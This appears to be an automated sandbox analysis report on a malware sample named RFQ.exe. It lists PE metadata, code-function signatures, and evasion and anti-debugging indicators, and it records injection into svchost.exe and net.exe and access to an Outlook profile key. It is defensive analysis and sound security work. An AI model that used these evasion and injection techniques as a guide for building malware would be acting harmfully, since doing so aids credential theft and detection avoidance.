                Source: C:\Windows\SysWOW64\net.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32
                Source: C:\Windows\SysWOW64\net.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
                Source: RFQ.exe | Static file information: File size 1604608 > 1048576
                Source: RFQ.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: RFQ.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: RFQ.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: RFQ.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: RFQ.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: RFQ.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: Binary string: net.pdbUGP source: svchost.exe, 00000001.00000003.1789591630.0000000000A3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1789544492.0000000000A1A000.00000004.00000020.00020000.00000000.sdmp, aSgPuBFuPS.exe, 00000002.00000002.3506537152.00000000014B8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: aSgPuBFuPS.exe, 00000002.00000000.1724430946.000000000098E000.00000002.00000001.01000000.00000004.sdmp, aSgPuBFuPS.exe, 00000005.00000000.1886858443.000000000098E000.00000002.00000001.01000000.00000004.sdmp
                Source: Binary string: wntdll.pdbUGP source: RFQ.exe, 00000000.00000003.1671016595.0000000003FA0000.00000004.00001000.00020000.00000000.sdmp, RFQ.exe, 00000000.00000003.1671169257.0000000004140000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1707773300.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1820846324.0000000003100000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1820846324.000000000329E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1705276435.0000000000C00000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000003.00000002.3507270235.000000000360E000.00000040.00001000.00020000.00000000.sdmp, net.exe, 00000003.00000003.1822664609.00000000032C1000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000003.00000002.3507270235.0000000003470000.00000040.00001000.00020000.00000000.sdmp, net.exe, 00000003.00000003.1820734447.0000000003114000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: RFQ.exe, 00000000.00000003.1671016595.0000000003FA0000.00000004.00001000.00020000.00000000.sdmp, RFQ.exe, 00000000.00000003.1671169257.0000000004140000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000003.1707773300.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1820846324.0000000003100000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1820846324.000000000329E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1705276435.0000000000C00000.00000004.00000020.00020000.00000000.sdmp, net.exe, net.exe, 00000003.00000002.3507270235.000000000360E000.00000040.00001000.00020000.00000000.sdmp, net.exe, 00000003.00000003.1822664609.00000000032C1000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000003.00000002.3507270235.0000000003470000.00000040.00001000.00020000.00000000.sdmp, net.exe, 00000003.00000003.1820734447.0000000003114000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: net.exe, 00000003.00000002.3508009639.0000000003A9C000.00000004.10000000.00040000.00000000.sdmp, net.exe, 00000003.00000002.3506249546.0000000000E21000.00000004.00000020.00020000.00000000.sdmp, aSgPuBFuPS.exe, 00000005.00000002.3507179433.00000000034BC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2106594111.000000001144C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: net.exe, 00000003.00000002.3508009639.0000000003A9C000.00000004.10000000.00040000.00000000.sdmp, net.exe, 00000003.00000002.3506249546.0000000000E21000.00000004.00000020.00020000.00000000.sdmp, aSgPuBFuPS.exe, 00000005.00000002.3507179433.00000000034BC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2106594111.000000001144C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: net.pdb source: svchost.exe, 00000001.00000003.1789591630.0000000000A3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1789544492.0000000000A1A000.00000004.00000020.00020000.00000000.sdmp, aSgPuBFuPS.exe, 00000002.00000002.3506537152.00000000014B8000.00000004.00000020.00020000.00000000.sdmp
                Source: RFQ.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: RFQ.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: RFQ.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: RFQ.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: RFQ.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\RFQ.exe | Code function: 0_2_0068615E GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo
                Source: C:\Users\user\Desktop\RFQ.exe | Code function: 0_2_006A09F6 push ecx; ret 0_2_006A0A09
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_003A1ACE push eax; iretd 1_2_003A1B68
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_003A61DF push FFFFFF9Bh; retf 1_2_003A61E1
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_003AAA1D push edi; retf 1_2_003AAA23
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_003B933F push ss; ret 1_2_003B9355
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_003A1B40 push eax; iretd 1_2_003A1B68
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_003A4BB6 push ds; iretd 1_2_003A4BB8
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_003A5BF7 push FFFFFFE2h; iretd 1_2_003A5BFD
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_003A3420 push eax; ret 1_2_003A3422
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_003B3CE3 push es; retf 1_2_003B3D12
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_003AAF60 push 0000007Bh; iretd 1_2_003AAF62
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_003B8F53 push esp; ret 1_2_003B9157
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0310225F pushad ; ret 1_2_031027F9
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031027FA pushad ; ret 1_2_031027F9
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031309AD push ecx; mov dword ptr [esp], ecx 1_2_031309B6
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0310283D push eax; iretd 1_2_03102858
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0310135E push eax; iretd 1_2_03101369
                Source: C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exe | Code function: 2_2_0336931E push ds; retf 2_2_03369328
                Source: C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exe | Code function: 2_2_03356238 push ds; iretd 2_2_0335623A
                Source: C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exe | Code function: 2_2_03357279 push FFFFFFE2h; iretd 2_2_0335727F
                Source: C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exe | Code function: 2_2_033702DF push esp; iretd 2_2_03370300
                Source: C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exe | Code function: 2_2_0336A9C1 push ss; ret 2_2_0336A9D7
                Source: C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exe | Code function: 2_2_03357861 push FFFFFF9Bh; retf 2_2_03357863
                Source: C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exe | Code function: 2_2_0335C09F push edi; retf 2_2_0335C0A5
                Source: C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exe | Code function: 2_2_0335C5E2 push 0000007Bh; iretd 2_2_0335C5E4
                Source: C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exe | Code function: 2_2_0336A5D5 push esp; ret 2_2_0336A7D9
                Source: C:\Windows\SysWOW64\net.exe | Code function: 3_2_0347225F pushad ; ret 3_2_034727F9
                Source: C:\Windows\SysWOW64\net.exe | Code function: 3_2_034727FA pushad ; ret 3_2_034727F9
                Source: C:\Windows\SysWOW64\net.exe | Code function: 3_2_034A09AD push ecx; mov dword ptr [esp], ecx 3_2_034A09B6
                Source: C:\Windows\SysWOW64\net.exe | Code function: 3_2_0347283D push eax; iretd 3_2_03472858
                Source: C:\Windows\SysWOW64\net.exe | Code function: 3_2_0347135E push eax; iretd 3_2_03471369
                Source: C:\Users\user\Desktop\RFQ.exe | Code function: 0_2_0069EFAD GetForegroundWindow,FindWindowW,IsIconic,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,ShowWindow
                Source: C:\Users\user\Desktop\RFQ.exe | Code function: 0_2_00711B74 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed
                Source: C:\Users\user\Desktop\RFQ.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\net.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: C:\Users\user\Desktop\RFQ.exe | API/Special instruction interceptor: Address: 171833C
                Source: C:\Windows\SysWOW64\net.exe | API/Special instruction interceptor: Address: 7FFE2220D324
                Source: C:\Windows\SysWOW64\net.exe | API/Special instruction interceptor: Address: 7FFE2220D7E4
                Source: C:\Windows\SysWOW64\net.exe | API/Special instruction interceptor: Address: 7FFE2220D944
                Source: C:\Windows\SysWOW64\net.exe | API/Special instruction interceptor: Address: 7FFE2220D504
                Source: C:\Windows\SysWOW64\net.exe | API/Special instruction interceptor: Address: 7FFE2220D544
                Source: C:\Windows\SysWOW64\net.exe | API/Special instruction interceptor: Address: 7FFE2220D1E4
                Source: C:\Windows\SysWOW64\net.exe | API/Special instruction interceptor: Address: 7FFE22210154
                Source: C:\Windows\SysWOW64\net.exe | API/Special instruction interceptor: Address: 7FFE2220DA44
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_003B8F53 rdtsc
                Source: C:\Windows\SysWOW64\net.exe | Window / User API: threadDelayed 379
                Source: C:\Windows\SysWOW64\net.exe | Window / User API: threadDelayed 9593
                Source: C:\Users\user\Desktop\RFQ.exe | API coverage: 4.0 %
                Source: C:\Windows\SysWOW64\svchost.exe | API coverage: 0.6 %
                Source: C:\Windows\SysWOW64\net.exe | API coverage: 2.7 %
                Source: C:\Windows\SysWOW64\net.exe TID: 7864 | Thread sleep count: 379 > 30
                Source: C:\Windows\SysWOW64\net.exe TID: 7864 | Thread sleep time: -758000s >= -30000s
                Source: C:\Windows\SysWOW64\net.exe TID: 7864 | Thread sleep count: 9593 > 30
                Source: C:\Windows\SysWOW64\net.exe TID: 7864 | Thread sleep time: -19186000s >= -30000s
                Source: C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exe TID: 7912 | Thread sleep time: -60000s >= -30000s
                Source: C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exe TID: 7912 | Thread sleep time: -43500s >= -30000s
                Source: C:\Windows\SysWOW64\net.exe | Last function: Thread delayed
                Source: C:\Users\user\Desktop\RFQ.exe | Code function: 0_2_006F680C FindFirstFileW,FindClose
                Source: C:\Users\user\Desktop\RFQ.exe | Code function: 0_2_006F68AD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime
                Source: C:\Users\user\Desktop\RFQ.exe | Code function: 0_2_006ECF94 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
                Source: C:\Users\user\Desktop\RFQ.exe | Code function: 0_2_006ED2C7 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
                Source: C:\Users\user\Desktop\RFQ.exe | Code function: 0_2_006F9560 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
                Source: C:\Users\user\Desktop\RFQ.exe | Code function: 0_2_006F96BB SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
                Source: C:\Users\user\Desktop\RFQ.exe | Code function: 0_2_006F9A49 FindFirstFileW,Sleep,FindNextFileW,FindClose
                Source: C:\Users\user\Desktop\RFQ.exe | Code function: 0_2_006EDADC lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose
                Source: C:\Users\user\Desktop\RFQ.exe | Code function: 0_2_006F5BB5 FindFirstFileW,FindNextFileW,FindClose
                Source: C:\Windows\SysWOW64\net.exe | Code function: 3_2_00B0C820 FindFirstFileW,FindNextFileW,FindClose
                Source: C:\Users\user\Desktop\RFQ.exe | Code function: 0_2_0068615E GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo
                Source: aSgPuBFuPS.exe, 00000005.00000002.3506650265.0000000001570000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllY
                Source: net.exe, 00000003.00000002.3506249546.0000000000E21000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllf
                Source: firefox.exe, 00000008.00000002.2107862956.000001E9D145C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Windows\SysWOW64\svchost.exe | Process information queried: ProcessInformation
                Source: C:\Windows\SysWOW64\svchost.exe | Process queried: DebugPort
                Source: C:\Windows\SysWOW64\net.exe | Process queried: DebugPort
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_003B8F53 rdtsc
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_003B7B93 LdrLoadDll
                Source: C:\Users\user\Desktop\RFQ.exe | Code function: 0_2_006FE9C9 BlockInput
                Source: C:\Users\user\Desktop\RFQ.exe | Code function: 0_2_0068445D GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW
                Source: C:\Users\user\Desktop\RFQ.exe | Code function: 0_2_0068615E GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo
                Source: C:\Users\user\Desktop\RFQ.exe | Code function: 0_2_006A4C78 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\RFQ.exe | Code function: 0_2_017185A8 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\RFQ.exe | Code function: 0_2_01718608 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\RFQ.exe | Code function: 0_2_01716F48 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0312C310 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03208324 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03208324 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03150310 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0316A30B mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031B035C mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031B035C mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031FA352 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031D8350 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031B2349 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031D437C mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0320634F mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03128397 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0312E388 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0315438F mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031DE3DB mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031DE3DB mov ecx, dword ptr fs:[00000030h]1_2_031DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031DE3DB mov eax, dword ptr fs:[00000030h]1_2_031DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031D43D4 mov eax, dword ptr fs:[00000030h]1_2_031D43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031D43D4 mov eax, dword ptr fs:[00000030h]1_2_031D43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031EC3CD mov eax, dword ptr fs:[00000030h]1_2_031EC3CD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0313A3C0 mov eax, dword ptr fs:[00000030h]1_2_0313A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0313A3C0 mov eax, dword ptr fs:[00000030h]1_2_0313A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0313A3C0 mov eax, dword ptr fs:[00000030h]1_2_0313A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0313A3C0 mov eax, dword ptr fs:[00000030h]1_2_0313A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0313A3C0 mov eax, dword ptr fs:[00000030h]1_2_0313A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0313A3C0 mov eax, dword ptr fs:[00000030h]1_2_0313A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031383C0 mov eax, dword ptr fs:[00000030h]1_2_031383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031383C0 mov eax, dword ptr fs:[00000030h]1_2_031383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031383C0 mov eax, dword ptr fs:[00000030h]1_2_031383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031383C0 mov eax, dword ptr fs:[00000030h]1_2_031383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B63C0 mov eax, dword ptr fs:[00000030h]1_2_031B63C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0314E3F0 mov eax, dword ptr fs:[00000030h]1_2_0314E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0314E3F0 mov eax, dword ptr fs:[00000030h]1_2_0314E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0314E3F0 mov eax, dword ptr fs:[00000030h]1_2_0314E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031663FF mov eax, dword ptr fs:[00000030h]1_2_031663FF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031403E9 mov eax, dword ptr fs:[00000030h]1_2_031403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031403E9 mov eax, dword ptr fs:[00000030h]1_2_031403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031403E9 mov eax, dword ptr fs:[00000030h]1_2_031403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031403E9 mov eax, dword ptr fs:[00000030h]1_2_031403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031403E9 mov eax, dword ptr fs:[00000030h]1_2_031403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031403E9 mov eax, dword ptr fs:[00000030h]1_2_031403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031403E9 mov eax, dword ptr fs:[00000030h]1_2_031403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031403E9 mov eax, dword ptr fs:[00000030h]1_2_031403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312823B mov eax, dword ptr fs:[00000030h]1_2_0312823B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312A250 mov eax, dword ptr fs:[00000030h]1_2_0312A250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03136259 mov eax, dword ptr fs:[00000030h]1_2_03136259
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031EA250 mov eax, dword ptr fs:[00000030h]1_2_031EA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031EA250 mov eax, dword ptr fs:[00000030h]1_2_031EA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B8243 mov eax, dword ptr fs:[00000030h]1_2_031B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B8243 mov ecx, dword ptr fs:[00000030h]1_2_031B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031E0274 mov eax, dword ptr fs:[00000030h]1_2_031E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031E0274 mov eax, dword ptr fs:[00000030h]1_2_031E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031E0274 mov eax, dword ptr fs:[00000030h]1_2_031E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031E0274 mov eax, dword ptr fs:[00000030h]1_2_031E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031E0274 mov eax, dword ptr fs:[00000030h]1_2_031E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031E0274 mov eax, dword ptr fs:[00000030h]1_2_031E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031E0274 mov eax, dword ptr fs:[00000030h]1_2_031E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031E0274 mov eax, dword ptr fs:[00000030h]1_2_031E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031E0274 mov eax, dword ptr fs:[00000030h]1_2_031E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031E0274 mov eax, dword ptr fs:[00000030h]1_2_031E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031E0274 mov eax, dword ptr fs:[00000030h]1_2_031E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031E0274 mov eax, dword ptr fs:[00000030h]1_2_031E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03134260 mov eax, dword ptr fs:[00000030h]1_2_03134260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03134260 mov eax, dword ptr fs:[00000030h]1_2_03134260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03134260 mov eax, dword ptr fs:[00000030h]1_2_03134260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312826B mov eax, dword ptr fs:[00000030h]1_2_0312826B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0320625D mov eax, dword ptr fs:[00000030h]1_2_0320625D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316E284 mov eax, dword ptr fs:[00000030h]1_2_0316E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316E284 mov eax, dword ptr fs:[00000030h]1_2_0316E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B0283 mov eax, dword ptr fs:[00000030h]1_2_031B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B0283 mov eax, dword ptr fs:[00000030h]1_2_031B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B0283 mov eax, dword ptr fs:[00000030h]1_2_031B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031402A0 mov eax, dword ptr fs:[00000030h]1_2_031402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031402A0 mov eax, dword ptr fs:[00000030h]1_2_031402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031C62A0 mov eax, dword ptr fs:[00000030h]1_2_031C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031C62A0 mov ecx, dword ptr fs:[00000030h]1_2_031C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031C62A0 mov eax, dword ptr fs:[00000030h]1_2_031C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031C62A0 mov eax, dword ptr fs:[00000030h]1_2_031C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031C62A0 mov eax, dword ptr fs:[00000030h]1_2_031C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031C62A0 mov eax, dword ptr fs:[00000030h]1_2_031C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0313A2C3 mov eax, dword ptr fs:[00000030h]1_2_0313A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0313A2C3 mov eax, dword ptr fs:[00000030h]1_2_0313A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0313A2C3 mov eax, dword ptr fs:[00000030h]1_2_0313A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0313A2C3 mov eax, dword ptr fs:[00000030h]1_2_0313A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0313A2C3 mov eax, dword ptr fs:[00000030h]1_2_0313A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031402E1 mov eax, dword ptr fs:[00000030h]1_2_031402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031402E1 mov eax, dword ptr fs:[00000030h]1_2_031402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031402E1 mov eax, dword ptr fs:[00000030h]1_2_031402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032062D6 mov eax, dword ptr fs:[00000030h]1_2_032062D6
